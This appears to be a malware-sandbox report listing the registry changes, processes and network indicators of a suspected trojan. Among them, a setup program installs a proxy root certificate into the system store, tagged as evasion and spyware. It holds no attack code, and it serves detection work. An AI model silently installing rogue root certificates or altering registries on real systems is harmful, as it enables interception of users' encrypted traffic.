Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1842 = "Russia TZ 4 Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2592 = "Tocantins Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Buses	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time"	csrss.exe

Modifies registry class 64 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\DatastoreSchemaVersion = "8"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 1e22494a6112d701	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 7e4df3496112d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{E01E698A-1B24-4B42-99CD-06BF87732AAD} = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar\WebBrowser	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\SharedCookie_MRACMigrationDone = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListInPrivateBrowsingAllowed = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "395205405"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\ImageStoreRandomFolder = "olidlpf"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 1395883b6112d701	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\NextBrowserDataLogTime = e02de39e9312d701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\OneTimeCleanup = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 771e923b6112d701	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\Rating Prompt Shown = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\""	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\ProcessingFlag = 5071ee496112d701	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 0000000000000000	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage	MicrosoftEdge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = ff43c6366112d701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CacheLimit = "1"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersi = "1"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0"	MicrosoftEdge.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

Processes:

Setup.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD	Setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	Setup.exe

Runs .reg file with regedit 2 IoCs

Processes:

regedit.exeregedit.exe

pid process

6756 regedit.exe
7740 regedit.exe
Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXE

pid process

3192 PING.EXE
2392 PING.EXE
1852 PING.EXE
7624 PING.EXE

pid	process
6756	regedit.exe
7740	regedit.exe

pid	process
3192	PING.EXE
2392	PING.EXE
1852	PING.EXE
7624	PING.EXE

Script User-Agent 5 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	444	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	454	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	554	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	608	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	655	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

1615018414768.exe1615018419737.exe1615018425096.exe23E04C4F32EF2158.tmpseed.exe

pid	process
3384	1615018414768.exe
3384	1615018414768.exe
3884	1615018419737.exe
3884	1615018419737.exe
2028	1615018425096.exe
2028	1615018425096.exe
2140	23E04C4F32EF2158.tmp
2140	23E04C4F32EF2158.tmp
2708	seed.exe
2708	seed.exe
3068
3068
3068
3068
3068
3068
3068
3068
3068
3068
3068
3068
3068
3068
3068
3068
3068
3068
3068
3068
3068
3068
3068
3068
3068
3068
3068
3068
3068
3068
3068
3068
3068
3068
3068
3068
3068
3068
3068
3068
3068
3068
3068
3068
3068
3068
3068
3068
3068
3068
3068
3068
3068
3068

Suspicious behavior: MapViewOfSection 4 IoCs

Processes:

MicrosoftEdgeCP.exeseed.exe17FF.exe3733.exe

pid process

2472 MicrosoftEdgeCP.exe
2708 seed.exe
4996 17FF.exe
956 3733.exe

pid	process
